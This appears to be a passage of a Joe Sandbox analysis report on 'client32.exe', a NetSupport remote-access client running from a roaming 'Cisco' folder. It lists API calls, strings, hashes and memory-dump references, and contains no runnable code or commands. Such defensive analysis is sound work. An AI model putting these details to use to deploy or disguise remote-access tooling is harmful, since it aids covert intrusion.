                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf
                                                                                                                                        • String ID: %s%s%s.bin$305090$_HF$_HW$_SW
                                                                                                                                        • API String ID: 2111968516-1635371599
                                                                                                                                        • Opcode ID: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                        • Instruction ID: fca8ef28a5c1b47a0d785ddae3209236aee7f502678e08843e7b704547fe2850
                                                                                                                                        • Opcode Fuzzy Hash: 6ee20e8f6fb76372610271b0b8adebac1fa156d7fec8b42d91c02657696d9c88
                                                                                                                                        • Instruction Fuzzy Hash: D5E09BA0D2060C5FF3005159AC01BAFBBAC1F4434AF80C0D0FEE9A6A82E974944086D5
                                                                                                                                        Function 68906940 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68906950
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                          • Part of subcall function 688FA4E0: EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,688FDA7F,?,00000000), ref: 688FA503
                                                                                                                                          • Part of subcall function 688FA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 688FA568
                                                                                                                                          • Part of subcall function 688FA4E0: Sleep.KERNEL32(00000000,?,688FDA7F,?,00000000), ref: 688FA581
                                                                                                                                          • Part of subcall function 688FA4E0: LeaveCriticalSection.KERNEL32(6893B898,00000000), ref: 688FA5B3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                                        • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                                                        • API String ID: 1112461860-1140593649
                                                                                                                                        • Opcode ID: 08bca1ca36bdea48a3b11b5675b8837051d1f0f6a9efdcee20d3f25514c7b514
                                                                                                                                        • Instruction ID: 4ddac414980ff260e0b700ca86cac390e99b8bf73fb146fe4edb6e38ccc1be31
                                                                                                                                        • Opcode Fuzzy Hash: 08bca1ca36bdea48a3b11b5675b8837051d1f0f6a9efdcee20d3f25514c7b514
                                                                                                                                        • Instruction Fuzzy Hash: 1C51B075A0C7259FEB32DEBCD840B6E77A8AB8630CF90052DD961D3281DB31E585CB91
                                                                                                                                        Function 110FFCC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 110FFD13
                                                                                                                                        • GetStockObject.GDI32(00000004), ref: 110FFD6B
                                                                                                                                        • RegisterClassA.USER32(?), ref: 110FFD7F
                                                                                                                                        • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 110FFDBC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                                        • String ID: NSMDesktopWnd
                                                                                                                                        • API String ID: 2669163067-206650970
                                                                                                                                        • Opcode ID: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                        • Instruction ID: e76810456149084fb848040635d8e5dd78421bccde4647aa26b9c0cc0d967c72
                                                                                                                                        • Opcode Fuzzy Hash: ba085a4a298ca2a35e46e8f911681fa87c9a64f63bde971845e5a7b50153441a
                                                                                                                                        • Instruction Fuzzy Hash: 0231F7B5D01259AFCB41DFA9D880A9EFBF8FB09314F50862EE569E3240E7345940CF95
                                                                                                                                        Function 11139340 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
                                                                                                                                        • KillTimer.USER32(00000000,00007F46,TermUI...), ref: 111393C3
                                                                                                                                        • FreeLibrary.KERNEL32(763B0000,?,TermUI...), ref: 1113943B
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeKillLibraryTimer
                                                                                                                                        • String ID: TermUI
                                                                                                                                        • API String ID: 2006562601-4085834059
                                                                                                                                        • Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                        • Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
                                                                                                                                        • Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                        • Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92
                                                                                                                                        Function 111419A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                        • API String ID: 47109696-3245241687
                                                                                                                                        • Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                        • Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
                                                                                                                                        • Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                        • Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71
                                                                                                                                        Function 1110E460 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                          • Part of subcall function 1110E3C0: __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                                          • Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 1110E508
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                        • API String ID: 806825551-1858614750
                                                                                                                                        • Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                        • Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
                                                                                                                                        • Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                        • Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751
                                                                                                                                        Function 11017520 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101755C
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                        • CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                        • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                        • API String ID: 2994556011-578995875
                                                                                                                                        • Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                        • Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
                                                                                                                                        • Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                        • Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791
                                                                                                                                        Function 11140870 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                          • Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
                                                                                                                                        • ResetEvent.KERNEL32(00000250), ref: 111408D9
                                                                                                                                        • SetEvent.KERNEL32(00000250), ref: 111408EF
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                        • String ID: MiniDump
                                                                                                                                        • API String ID: 1494854734-2840755058
                                                                                                                                        • Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                        • Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
                                                                                                                                        • Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                        • Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5
                                                                                                                                        Function 11017440 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70synchronizationCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017472
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                        • CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                        • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                        • API String ID: 2994556011-2037925671
                                                                                                                                        • Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                        • Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
                                                                                                                                        • Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                        • Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761
                                                                                                                                        Function 688F8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 688F5014
                                                                                                                                          • Part of subcall function 688F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F5034
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 688F8EAE
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 688F8EBF
                                                                                                                                          • Part of subcall function 688F2420: _strrchr.LIBCMT ref: 688F242E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
